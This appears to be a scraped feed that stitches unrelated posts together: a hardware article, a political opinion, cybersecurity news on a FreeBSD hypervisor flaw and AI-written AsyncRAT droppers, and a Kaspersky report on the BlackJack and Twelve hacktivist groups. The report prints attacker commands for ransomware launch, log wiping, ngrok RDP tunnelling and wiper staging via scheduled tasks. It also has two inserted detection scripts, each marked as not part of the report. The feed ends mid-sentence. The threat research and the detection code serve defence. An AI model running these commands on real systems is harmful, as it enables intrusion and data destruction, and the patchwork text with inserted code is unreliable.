The onboard hardware is substantial, starting with a Lattepanda Sigma SBC, a small WiFi travel router, a Samsung SSD, a pair of seven-port USB hubs, and a quartet of Anker USB battery banks. The software defined radio (SDR) gear includes a HackRF One, an Airspy Mini, a USRP B205mini, and a Nooelec NESDR with an active antenna. There are also three USB WiFi adapters, an AX210 WiFi/Bluetooth combo adapter, a uBlox GPS receiver, and a GPS-disciplined oscillator, both with QFH antennas. There’s also a CatSniffer multi-protocol IoT dongle and a Flipper Zero for good measure, and probably a bunch of other stuff we missed. Phew!

As for mounting all this stuff, [Bag-Builds] went the distance with a nicely designed internal frame system. Much of it is 3D printed, but the basic frame and a few rails are made from aluminum. The real hack here, though, is getting the proper USB cables for each connection. The cable lengths are just right so that nothing needs to get bundled up and cable-tied. The correct selection of adapters is a thing of beauty, too, with very little interference between the cables despite some pretty tightly packed gear.

What exactly you’d do with this cyberpack, other than stay the hell away from airports, police stations, and government buildings, isn’t exactly clear. But it sure seems like you’ve got plenty of options. And yes, we’re aware that this is a commercial product for which no build files are provided, but if you’re sufficiently inspired, we’re sure you could roll your own.

youtube.com/embed/-jezoIkX2IE?…

Thanks to [KC] for the tip on this one.


hackaday.com/2024/09/25/cyberp…



I am not a pacifist, at least not in the obtuse sense commonly understood, aimed only at freeing oneself from other people’s problems, but the root of war is the sub-culture of violence, of intolerance, of allergy to what is different, of injustice, of bullying. Peace is not the absence of war, but justice. And Israel would do well to stop behaving like the Americans did with the Native Americans. And Putin would do well at least to try to stop absurdly wanting to appear as the liberator of the world from US domination. Rarely is anyone in the Russian sphere of influence free and happy.





FreeBSD suffers from a dangerous RCE! Analysis and implications


Recently, the SecActor Telegram channel disclosed news of considerable importance for cybersecurity: a critical remote code execution (RCE) vulnerability affecting the FreeBSD operating system. This vulnerability, CVE-2024-41721, discovered by the Synacktiv security team, concerns its bhyve hypervisor and represents a serious threat to the security of the virtual machines running on this system.

Origin of the problem and impact on security


The vulnerability originates in the emulation of the XHCI (eXtensible Host Controller Interface) controller in the bhyve component, whose purpose is to emulate USB hardware inside virtual machines. The problem lies in a missing memory bounds check, which allows code to read outside the designated area, potentially causing a crash of the hypervisor process or, worse, the execution of arbitrary code on the host machine.

This vulnerability is particularly dangerous because it allows malware running in a guest virtual machine to take control of the entire physical system. In this context, the fact that the bhyve process runs with elevated (root) privileges only amplifies the consequences of a successful attack.

Although bhyve uses a sandboxing technology (Capsicum) to reduce process capabilities and isolate processes, the risk of exploitation remains, especially in configurations that emulate USB devices.

A problem affecting all versions of FreeBSD


All FreeBSD systems using XHCI emulation are vulnerable and, at the time the advisory was published, no alternative workaround existed. The only way to mitigate the risk is to apply the patches released on 19 September 2024, which fix this vulnerability.

Updating systems promptly and restarting virtual machines is crucial to ensure that the fixes take effect and to prevent the vulnerability from persisting in running instances.

CVE-2024-41721 affects one of FreeBSD’s key components, the bhyve hypervisor, which is widely used for machine virtualisation. The flaw lies in the USB code, specifically in the XHCI emulation, where a missing memory bounds check can allow a malicious user to read or write outside the bounds of allocated memory, gaining control of the host system.

Hypervisors and security


Hypervisors such as bhyve are used to create and manage virtual machines (VMs), and play a crucial role in modern IT infrastructure, especially in cloud and data centre environments. Virtualisation allows several operating systems to run simultaneously on a single physical machine, increasing the efficiency of resource use. However, precisely because of this shared model, a vulnerability in a hypervisor can expose the entire system to risk.

The context of the vulnerability


The vulnerability in question is particularly insidious because it can be exploited by malicious software running in a guest virtual machine, thereby allowing arbitrary code execution on the host. This type of vulnerability threatens the separation between VM and host, one of the main advantages of virtualisation. In effect, an attack of this kind compromises the hypervisor’s security model.

According to the FreeBSD security advisory, the vulnerability stems from poor memory handling in the emulation of the XHCI controller. The XHCI controller is the part of the system used to manage USB 3.0 and later devices, allowing VMs to interact with virtual USB devices. The failure to check the size of the data passing through the USB emulation can lead to corruption of data in memory, allowing an attacker to read or write outside the permitted memory areas, violating the integrity of the system.

Potential exploit and attack scenarios


This vulnerability is particularly critical because bhyve runs with root privileges, increasing the potential impact of a successful exploit. An attacker exploiting this vulnerability could crash the hypervisor or, worse, execute malicious code with the highest privileges available. The possibility of an attacker on a vulnerable VM gaining remote control of the host makes this vulnerability one of the most serious threats to FreeBSD environments.

The fact that bhyve runs in a sandbox via the Capsicum technology only partially mitigates the risk. Capsicum is a security framework that limits process privileges, but it is not enough to entirely eliminate the possibility of attacks exploiting this vulnerability. Moreover, the vulnerability affects all supported versions of FreeBSD that use bhyve with XHCI emulation, making an immediate update necessary.

Impact and mitigation


The only solution for system administrators is to update their FreeBSD installations to the version that includes the patch released on 19 September 2024. This update fixes the vulnerability by resolving the memory mishandling problem. It is also essential to restart all virtual machines that use emulated USB devices to ensure that the fix is applied correctly.

In production environments, where uptime is critical, this type of vulnerability represents a serious threat. A successful exploit could cause significant damage, including service disruption, data loss and unauthorised access to sensitive information. The patching process therefore requires careful planning to minimise the impact on daily operations, but it is an essential measure to ensure the security of systems.

Wider implications for cybersecurity


This vulnerability raises several considerations. First, it once again highlights how virtualisation technologies, which are increasingly widespread, have become an attractive target for cybercriminals. Hitting a hypervisor potentially means gaining access to several virtual machines and, consequently, to a wide range of data and services.

Second, the discovery of the security bug by Synacktiv, a French company known for its expertise in critical vulnerabilities, underlines the importance of constant auditing and testing of the software in use, even on apparently secure systems such as FreeBSD.

Finally, this specific case reminds us how dangerous it is to underestimate vulnerabilities in “peripheral” components such as USB emulation. Even if at first glance they may seem secondary compared to better-known and more critical flaws, they can still be exploited to gain unauthorised access to core systems.

Conclusion


The RCE vulnerability discovered in FreeBSD is a clear warning sign for system administrators and security officers. In a landscape where threats continue to evolve and adapt, keeping systems constantly updated and monitored is essential to prevent potentially devastating attacks. Adopting preventive measures, such as the timely application of patches and careful control of system configurations, remains the only effective way to mitigate the risk of security breaches.

Moreover, cases like this remind us of the importance of constant collaboration between security companies, software developers and users, so that vulnerabilities are identified and resolved as quickly as possible.

The article FreeBSD suffers from a dangerous RCE! Analysis and implications comes from il blog della sicurezza informatica.



AI writes code with style! Exceptional comments for the AsyncRAT malware


Analysts at HP Wolf Security examined recent attacks against French users and found that the AsyncRAT malware was distributed using malicious code clearly created with the help of artificial intelligence.

Cybersecurity specialists had previously warned that cybercriminals can use generative AI to create convincing phishing emails, voice deepfakes and other not-quite-legal activities.

xakep.ru/2024/01/11/fake-voice…

Moreover, AI has already been used to develop malware. In the spring of this year, researchers at Proofpoint warned that a PowerShell script, probably created using an LLM, was used to distribute the Rhadamanthys infostealer.

A new similar case was recorded by HP Wolf Security specialists in early June.
The attacks began with ordinary phishing emails containing the lure in the form of an invoice, delivered as an encrypted HTML attachment.

“In this case, the attackers embedded an AES key in JavaScript inside the attachment. This does not happen very often, and it was the main reason we paid attention to this threat,” the experts explain, adding that they managed to bypass the encryption by plain brute force, since it was known that the decrypted file had to be a ZIP archive.

The decrypted attachment contained a VBScript, examination of which revealed that “the attacker carefully commented and structured all the code”, which rarely happens when the code is written by a person (attackers usually try to hide how their malware works). The purpose of the VBScript was to persist on the infected machine by creating scheduled tasks and new keys in the Windows registry.

“These comments described in detail exactly what the code was for. This is what generative AI services usually do when they provide code examples with explanations,” the experts write.

In addition, according to the experts, the AI’s involvement was indicated by the structure of the scripts, the comments on every line, and the choice of French for function and variable names.

Malicious code written by artificial intelligence

As a result, AsyncRAT was downloaded and executed on the victim’s system. This is free, open-source malware that can intercept keystrokes, provides an encrypted connection to the victim’s computer, and can also download additional payloads.

The researchers conclude that generative AI can help low-skilled criminals write malware in minutes and adapt it to attack different platforms (Linux, macOS, Windows, etc.). And even if sophisticated attackers do not use AI for the actual development, they can use it to speed things up.

The article AI writes code with style! Exceptional comments for the AsyncRAT malware comes from il blog della sicurezza informatica.



Hungary to drop reference to telecoms market consolidation in new Council conclusions


The Hungarian Presidency of the Council of the EU should delete any reference to consolidation in the telecommunications market in the next iteration of the draft Council conclusions which should be published on 9 October, four sources with insider knowledge told Euractiv.


euractiv.com/section/digital/n…



From 12 to 21: how we discovered connections between the Twelve and BlackJack groups



While analyzing attacks on Russian organizations, our team regularly encounters overlapping tactics, techniques, and procedures (TTPs) among different cybercrime groups, and sometimes even shared tools. We recently discovered one such overlap: similar tools and tactics between two hacktivist groups – BlackJack and Twelve, which likely belong to a single cluster of activity.

In this report, we will provide information about the current procedures, legitimate tools, and malware used by the BlackJack group, and demonstrate their similarity to artifacts found in Twelve’s attacks. We will also analyze another recently discovered activity that has much in common with the activity of the potential cluster.

Who are BlackJack?


BlackJack is a hacktivist group that emerged at the end of 2023, targeting companies based in Russia. In their Telegram channel, the group states that it aims to find vulnerabilities in the networks of Russian organizations and government institutions.

As of June 2024, BlackJack has publicly claimed responsibility for over a dozen attacks. Our telemetry also contains information on other unpublicized attacks, where indicators suggest BlackJack’s involvement.

The group only uses freely available and open-source software, such as the SSH client PuTTY or the wiper Shamoon, which has been available on GitHub for several years. This confirms that the group operates as hacktivists and lacks the resources typical of large APT groups.

Malware and legitimate tools in BlackJack attacks

Wiper – Shamoon


BlackJack uses a version of the Shamoon wiper written in Go in their attacks. Static analysis helped us extract the following characteristic strings:

Strings from the wiper

During our research, we found Shamoon samples in the following locations:

  • Sysvol\domain\scripts
  • \\[DOMAIN]\netlogon\
  • C:\ProgramData\

Ransomware – LockBit


In addition to the wiper, BlackJack also uses a leaked version of the LockBit ransomware to harm their victims.

Verdicts with which BlackJack’s version of LockBit was detected, source: Kaspersky Threat Intelligence Portal (TIP)

We found the ransomware in the same directories as the wiper:

  • Sysvol\domain\scripts
  • \\[DOMAIN]\netlogon\
  • C:\ProgramData\

The network directories for placing the malware were not chosen at random. This allows the attackers to spread their samples across the victim’s infrastructure and later place them in C:\ProgramData\ for further execution in the system.

To launch LockBit, the attackers use scheduled tasks containing the following command line (the 32-character password may vary depending on the host or victim):

C:\ProgramData\bj.exe -pass aa83ec8e98326e234260ebb650d48f20

The ransom note only contains the name of the group:

Contents of the LockBit ransom note

This confirms that the group is not aiming for financial gain, but rather to cause damage to the compromised organization.

Ngrok


To maintain persistent access to compromised victim resources, the attackers use tunneling with the common ngrok utility. We found the utility and its configuration file in the following directories:

Paths | Description
\Users\[USER]\Downloads\ngrok-v3-stable-windows-amd64.zip | Archive containing executable and configuration files.
\Program Files\Windows Media Player\ngrok.exe | Ngrok executable file.
\Users\[USER]\AppData\Local\ngrok\ngrok.yml | Configuration file containing an authentication token and other information.

Here is a list of commands related to ngrok execution:

Commands | Description
.\ngrok.exe config add-authtoken <TOKEN> | Ngrok authentication process.
Start-Process -FilePath "ngrok.exe" -WindowStyle Hidden -ArgumentList 'tcp 3389' | Launches the ngrok.exe process and creates a TCP tunnel on port 3389 (RDP).
.\ngrok.exe tcp 3389 | Alternative for creating a TCP tunnel on port 3389 (RDP).
.\ngrok.exe udp 3389 | Creates a UDP tunnel on port 3389 (RDP).

Radmin, AnyDesk, PuTTY


To ensure remote access to the system, BlackJack installs various remote access tools (RATs). Judging by the incidents we studied, the attackers initially attempted to use the Radmin utility, but all the external connections we observed were made through AnyDesk.

During the RAT installation, the attackers created the following services:

Service name | Launch commands
Radmin Server V3 | "C:\Windows\SysWOW64\rserver30\RServer3.exe" /service
raddrvv3 | C:\Windows\SysWOW64\rserver30\raddrvv3.sys
AnyDesk Service | "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

Additionally, the popular SSH client PuTTY was used to connect to certain hosts within the infrastructure.
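Detection logic for the tooling described in this section, as an added example that is not part of the Kaspersky report: it runs rules modelled on the command lines quoted above (the LockBit -pass launch from C:\ProgramData, the NETLOGON-to-ProgramData copy, the ngrok RDP tunnels and the Radmin/AnyDesk service commands) over constructed sample log records, and flags hosts that show both payload staging and a remote-access indicator. The timestamp|host|command record layout, the host names, the domain corp.example and the ngrok token are assumptions made for the sample.

```python
"""Added example: detection rules modelled on the BlackJack/Twelve command
lines quoted in the report. Not part of the Kaspersky report or its tooling.
The record layout (timestamp|host|command), the host names, the domain
corp.example and the ngrok token below are constructed assumptions."""
import re
from typing import Any, Dict, List, Set

# Rule name -> regex applied to a process or scheduled-task command line.
RULES: Dict[str, Any] = {
    # LockBit run from C:\ProgramData with the 32-character -pass argument
    "lockbit_pass_launch": re.compile(
        r"C:\\ProgramData\\\S+\.exe\s+-pass\s+[0-9a-fA-F]{32}\b"),
    # Payload copied from the domain NETLOGON share into C:\ProgramData
    # (backticks optional: they appear in the TaskCache registry values)
    "netlogon_to_programdata_copy": re.compile(
        r"Copy-Item\s+`?\\\\[^\s\\]+\\netlogon\\[^\s`]+`?\s+-Destination\s+`?C:\\ProgramData",
        re.IGNORECASE),
    # ngrok authentication and TCP/UDP tunnels to RDP (3389)
    "ngrok_authtoken": re.compile(
        r"ngrok(?:\.exe)?\s+config\s+add-authtoken", re.IGNORECASE),
    "ngrok_rdp_tunnel": re.compile(
        r'''ngrok(?:\.exe)?["']?\s.*?\b(?:tcp|udp)\s+3389\b''', re.IGNORECASE),
    # Remote access tools registered as Windows services
    "radmin_service": re.compile(
        r'rserver30\\RServer3\.exe"?\s+/service', re.IGNORECASE),
    "anydesk_service": re.compile(
        r'AnyDesk\.exe"?\s+--service', re.IGNORECASE),
}

# Rules that stage or launch the payload vs. rules that provide remote access.
PAYLOAD_RULES: Set[str] = {"lockbit_pass_launch", "netlogon_to_programdata_copy"}
ACCESS_RULES: Set[str] = {"ngrok_authtoken", "ngrok_rdp_tunnel",
                          "radmin_service", "anydesk_service"}

# Constructed sample records (timestamp|host|command line); the token is a placeholder.
SAMPLE_LOG: List[str] = r"""
2024-06-01T10:00:01|WS07|powershell.exe Copy-Item \\corp.example\netlogon\bj.exe -Destination C:\ProgramData
2024-06-01T10:00:09|WS07|C:\ProgramData\bj.exe -pass aa83ec8e98326e234260ebb650d48f20
2024-06-01T10:01:10|WS07|.\ngrok.exe config add-authtoken PLACEHOLDER_TOKEN
2024-06-01T10:01:12|WS07|Start-Process -FilePath "ngrok.exe" -WindowStyle Hidden -ArgumentList 'tcp 3389'
2024-06-01T10:02:00|WS07|"C:\Windows\SysWOW64\rserver30\RServer3.exe" /service
2024-06-01T10:02:30|WS07|"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
2024-06-01T10:03:00|WS07|.\ngrok.exe udp 3389
2024-06-01T10:05:00|WS12|C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt
2024-06-01T10:06:00|WS12|powershell.exe Copy-Item C:\Users\alice\report.docx -Destination D:\backup
""".strip().splitlines()


def parse_record(line: str) -> Dict[str, str]:
    """Split one constructed 'timestamp|host|command' record into fields."""
    ts, host, cmd = line.split("|", 2)
    return {"ts": ts, "host": host, "cmd": cmd}


def match_rules(cmd: str) -> List[str]:
    """Return the names of all rules whose pattern occurs in the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_log(lines: List[str]) -> List[Dict[str, Any]]:
    """Return one finding per record that triggers at least one rule."""
    findings: List[Dict[str, Any]] = []
    for line in lines:
        rec = parse_record(line)
        hits = match_rules(rec["cmd"])
        if hits:
            findings.append({**rec, "rules": hits})
    return findings


def hosts_with_full_chain(findings: List[Dict[str, Any]]) -> List[str]:
    """Hosts where both payload staging/launch and a remote-access indicator
    were seen: the combination the report attributes to BlackJack."""
    seen: Dict[str, Set[str]] = {}
    for f in findings:
        seen.setdefault(f["host"], set()).update(f["rules"])
    return sorted(h for h, rules in seen.items()
                  if rules & PAYLOAD_RULES and rules & ACCESS_RULES)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['host']}: {', '.join(f['rules'])}")
    print("hosts with staging + remote access:", hosts_with_full_chain(results))
```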

Connection with the Twelve group


The malware and legitimate tools described above significantly overlap with the arsenal of the hacktivist group Twelve. This group also relies on publicly available software and does not use proprietary tools in its attacks.

Most of the connections and overlaps between the two groups were discovered through Kaspersky Security Network (KSN) telemetry and Kaspersky Threat Intelligence solutions. KSN telemetry is anonymized data from users of our products who have consented to share and process this information.

Malware sample similarities


Let’s first examine the similarities between the ransomware and wiper samples from the BlackJack and Twelve groups. Below is the information from the Kaspersky Threat Intelligence Portal (TIP) on the LockBit ransomware file discovered while investigating the BlackJack attacks:

BlackJack file information

The sample is named bj.exe, presumably an abbreviation for the BlackJack group. Among other things, the TIP page shows a list of similar files compiled using the Similarity technology, which identifies files with similar patterns. Although the sample used by the hacktivists was created with the leaked LockBit builder, Similarity first identifies the most closely related files. Note the first hash in the list: 39B91F5DFBBEC13A3EC7CCE670CF69AD.

List of similar files

Checking this hash on the Threat Intelligence Portal reveals that it was mentioned in our recent investigation into the Twelve group.

This suggests that the two groups use similar LockBit samples. Additionally, analysis of the configuration of the two samples (BlackJack and Twelve) showed that their exclusion lists (files, directories, and extensions to leave unencrypted) are identical.

Just like BlackJack’s LockBit sample, the Twelve group’s ransomware also has a list of similar files.

List of similar files

Upon checking one of them (underlined in red on the screenshot), we found that the file was also named bj.exe. This means that it is another instance of the BlackJack group’s ransomware, further indicating that the two groups use nearly identical LockBit samples.

Below is a list of paths where LockBit samples were found during the investigation of incidents related to the BlackJack and Twelve groups:

BlackJack | Twelve
\\[DOMAIN]\netlogon\ | \\[DOMAIN]\netlogon\
C:\ProgramData\ | C:\ProgramData\
Sysvol\domain\scripts |

Summing up the ransomware analysis, we can draw the following conclusions:

  • Both groups use similar LockBit ransomware samples;
  • The paths where these samples were found are almost identical.

Let’s continue searching for further connections.

Wiper reuse


The study of wiper samples from incidents involving the BlackJack and Twelve groups also revealed similarities between them.

Both wipers overwrite the MBR record with almost identical placeholder strings:

MBR placeholder of the BlackJack wiper

MBR placeholder of the Twelve wiper

By analyzing the BlackJack wiper on the Threat Intelligence Portal, we found that in some cases it was extracted from the following archive:

Information about the archive containing the BlackJack wiper

Examining the archive, we found the Chaos ransomware – 646A228C774409C285C256A8FAA49BDE:

Ransomware file in the archive

Moreover, this file was mentioned in our report on the Twelve group. That is, malware from both groups is distributed in the same archive.

Checking the file names and paths, we discovered a familiar network directory, \sysvol\domain\script.

File names and paths

In addition, during our investigation of attacks carried out by the Twelve group, we also found the use of Shamoon-based wipers. Moreover, according to KSN data, a specific variant of Shamoon, which was involved in BlackJack group attacks, was also seen in some Twelve attacks.

Similar to the analysis of the LockBit ransomware, we decided to study the paths where the wipers were found in incidents related to the BlackJack and Twelve groups. As you can see from the table below, these paths are identical:

BlackJack:
  Sysvol\domain\scripts
  \\[DOMAIN]\netlogon\
  C:\ProgramData\
Twelve:
  Sysvol\domain\scripts
  \\[DOMAIN]\netlogon\
  C:\ProgramData\

Summing up the analysis of the Shamoon wiper, we can confidently say that both groups use it or its components in their attacks and place them in identical directories. Moreover, the version of Shamoon that became available as a result of the leak was written in C#, whereas the variants of this wiper used in the BlackJack and Twelve attacks were rewritten in Go, further supporting the connection between these groups.

Familiar commands and utilities


In addition to the connections identified through analyzing the malware samples, we also discovered overlaps in the commands and tools used by both groups.

Below are the commands found in the BlackJack and Twelve group attacks.

Creating scheduled tasks:

BlackJack:
  reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ID}:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\bj.exe` -Destination `C:\ProgramData`
  reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ID}:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\wip.exe` -Destination `C:\ProgramData`
Twelve:
  reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ID}:Actions","`POWERSHELL.EXE` Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData'
  reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ID}:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\wiper.exe` -Destination `C:\ProgramData'

Clearing event logs:

BlackJack:
  powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}
Twelve:
  powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

As you can see, apart from the names of the executable files, the commands are identical.

The list of publicly available utilities used by the groups also partially overlaps:

BlackJack:
  Mimikatz
  PsExec
  Ngrok
  PuTTY
  XenAllPasswordPro
  Radmin
  AnyDesk
Twelve:
  Mimikatz
  PsExec
  Ngrok
  PuTTY
  XenAllPasswordPro
  chisel
  BloodHound
  adPEAS
  PowerView
  RemCom
  CrackMapExec
  WinSCP

New activity


During our research, we also discovered another activity that closely resembles the ones described above. At this point, we cannot definitively determine which specific group is responsible for this activity; however, the malware samples and procedures clearly indicate that the source is the activity cluster under investigation.

The similarities we found are listed below:

  1. The discovered wiper contains the characteristic strings we saw in the Twelve and BlackJack wipers and also creates a similar MBR record.
  2. The wiper is spread through the sysvol network directory and saved using a scheduled task, which copies it to that same C:\ProgramData directory.
    reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item
    `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\letsgo.exe` -Destination `C:\ProgramData`
  3. As in the BlackJack and Twelve attacks, before wiping data with the wiper, the attackers launch the ransomware (enc.exe), which is also copied from the network folder to C:\ProgramData:
    reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item
    `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\enc.exe` -Destination `C:\ProgramData`
  4. As in Twelve group attacks, the execution of the wiper, as well as copying the wiper and ransomware from the network directory to the C:\ProgramData folder, are performed using scheduled tasks:
    Unknown threat:
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`cmd.exe` /c \\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\letsgo.exe
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\letsgo.exe` -Destination `C:\ProgramData`
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\enc.exe` -Destination `C:\ProgramData`
    Twelve:
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`cmd.exe` /c \\[DOMAIN]\netlogon\wiper.exe
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\wiper.exe` -Destination `C:\ProgramData
      reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`POWERSHELL.EXE` Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

Also during the investigation of this activity, various artifacts and procedures were discovered that we had not seen in the BlackJack and Twelve attacks:

  1. Using the PowerShell cmdlet Get-MpPreference to gather information about disabled Windows Defender features.
    `powershell.exe` -ex bypass -c Get-MpPreference | fl disable*
  2. Creating scheduled tasks:
    Task name: \run1
      Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`cmd.exe` /c C:\ProgramData\letsgo.exe
      Description: Executing the wiper from the C:\ProgramData folder
    Task name: \def
      Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` -ex bypass -c Get-MpPreference | fl disable*
      Description: Collecting information about disabled Windows Defender features
  3. Using WMIExec for lateral movement; the observed command changes to the root directory and redirects its output to the ADMIN$ share:
    cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1710197641.3559299 2>&1
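The overlapping command lines in the "Familiar commands and utilities" and "New activity" sections above can be turned into hunting rules for process-creation telemetry. This is an added example, not code from the report or from Kaspersky; the regexes, host names, corp.local domain and sample telemetry are all constructed here, and the last sample line is a benign control.

```python
import re
from collections import defaultdict

# Hunting rules for the command lines quoted in the report: staging from a DC
# share into C:\ProgramData, execution from there, wevtutil log clearing,
# Defender enumeration, and the WMIExec output redirect to ADMIN$.
# The regexes are this example's own, not taken from the report.
RULES = {
    "copy_dc_share_to_programdata": re.compile(
        r"copy-item\s+`?\\\\[^\s`]+\\(netlogon|sysvol)\\[^\s`]*"
        r".*-destination\s+`?c:\\programdata", re.I),
    "exec_from_programdata_or_dc_share": re.compile(
        r"cmd\.exe\s+/c\s+(c:\\programdata\\|\\\\[^\s`]+\\(netlogon|sysvol)\\)\S*\.exe", re.I),
    "mass_event_log_clear": re.compile(r"wevtutil\s+el\b.*wevtutil\s+cl\b", re.I),
    "defender_config_enum": re.compile(r"get-mppreference\b.*\bdisable\*", re.I),
    "wmiexec_admin_share_redirect": re.compile(
        r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+\s+2>&1", re.I),
}

# Constructed sample telemetry as (host, command line); hosts and the
# corp.local domain are placeholders, the last line is a benign control.
SAMPLE_RECORDS = [
    ("ws01", "`powershell.exe` Copy-Item `\\\\corp.local\\netlogon\\bj.exe` -Destination `C:\\ProgramData`"),
    ("ws01", "cmd.exe /c C:\\ProgramData\\letsgo.exe"),
    ("ws01", "powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}"),
    ("ws02", "powershell.exe -ex bypass -c Get-MpPreference | fl disable*"),
    ("ws02", "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1710197641.3559299 2>&1"),
    ("ws03", "powershell.exe Copy-Item C:\\Users\\alice\\report.docx -Destination D:\\backup"),
]

def classify_command_line(cmd):
    """Names of every rule matching one command line (empty list if none)."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def find_staging_chains(records):
    """Hosts showing the report's full pattern: a binary copied from a DC share
    into ProgramData and then launched from there (or straight from the share)."""
    seen = defaultdict(set)
    for host, cmd in records:
        seen[host].update(classify_command_line(cmd))
    chain = {"copy_dc_share_to_programdata", "exec_from_programdata_or_dc_share"}
    return sorted(host for host, names in seen.items() if chain <= names)

if __name__ == "__main__":
    for host, cmd in SAMPLE_RECORDS:
        print(host, classify_command_line(cmd) or "benign", cmd)
    print("staging chain on:", find_staging_chains(SAMPLE_RECORDS))
```

The per-line rules fire on single events; find_staging_chains correlates per host so that the copy-then-execute sequence from the scheduled tasks above stands out even when each step alone looks like administration.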


Victims


The mentioned malware samples, utilities, and command lines were found in the infrastructures of government, telecommunications, and industrial companies in Russia.

Attribution


Based on our research, we cannot be sure that the same actors are behind the activities of both groups. However, we suspect that the BlackJack and Twelve groups are part of a unified cluster of hacktivist activity aimed at organizations located in Russia.

Conclusion


In this study, we demonstrated that the BlackJack and Twelve groups have similar targets and use similar malware, distributing and executing it using the same methods. At the same time, they are not interested in financial gain but aim to inflict maximum damage on target organizations by encrypting, deleting, and stealing data and resources.

Indicators of compromise

Wiper – Shamoon


ED5815DDAD8188C198E0E52114173CB6 wip.exe/wiper.exe
5F88A76F52B470DC8E72BBA56F7D7BB2 letsgo.exe

Ransomware – LockBit


DA30F54A3A14AD17957C88BF638D3436 bj.exe
BF402251745DF3F065EBE2FFDEC9A777 bj.exe

File paths


Sysvol\domain\scripts\wip.exe
\\[DOMAIN]\netlogon\wip.exe
C:\ProgramData\wip.exe
Sysvol\domain\scripts\bj.exe
\\[DOMAIN]\netlogon\bj.exe
C:\ProgramData\bj.exe
C:\ProgramData\letsgo.exe
\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\letsgo.exe
C:\ProgramData\enc.exe
\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\enc.exe
C:\Users\[USER]\Downloads\ngrok-v3-stable-windows-amd64.zip
C:\Program Files\Windows Media Player\ngrok.exe
C:\Users\[USER]\AppData\Local\ngrok\ngrok.yml

Scheduled task names


\copy
\run1
\go2
\im
\def


securelist.com/blackjack-hackt…



Help me understand... if someone you can't stand, who always does stupid things, does one thing right, do you attack him even when he does the right thing? What happened to honesty?


Afghan stories of escape and denied rights


@Notizie dall'Italia e dal mondo
Zamaair and his family had to sell everything they owned in order to flee Kabul. They have been in Pakistan for a year and a half, waiting for asylum.
The article "Afghan stories of escape and denied rights" comes from Pagine Esteri.



Cybersecurity: the ITU gives Italy full marks


@Informatica (Italy e non Italy 😁)
The ITU, the UN agency that manages global radio spectrum policy, praises Italy in the Global Cybersecurity Index 2024. Our country passed the agency's assessment with full marks (100/100), and the agency recognizes it as a world leader for its cybersecurity posture, thanks to: An excellent achievement that we



Cybersecurity: only one organization in three is able to manage cybersecurity 24 hours a day


Only one organization in three is able to manage cybersecurity around the clock. Most companies, moreover, lack sufficient resources and the support of senior management to detect and mitigate the threats hitting their infrastructure as well as they could. The figure comes from "Underfunded and unaccountable: How a lack of corporate leadership is hurting cybersecurity", the latest research from Trend Micro, a global cybersecurity leader.

The Trend Micro study examines how those responsible approach the management of attack-surface risk, highlighting gaps that could seriously compromise organizations' cyber resilience.

The research shows that:

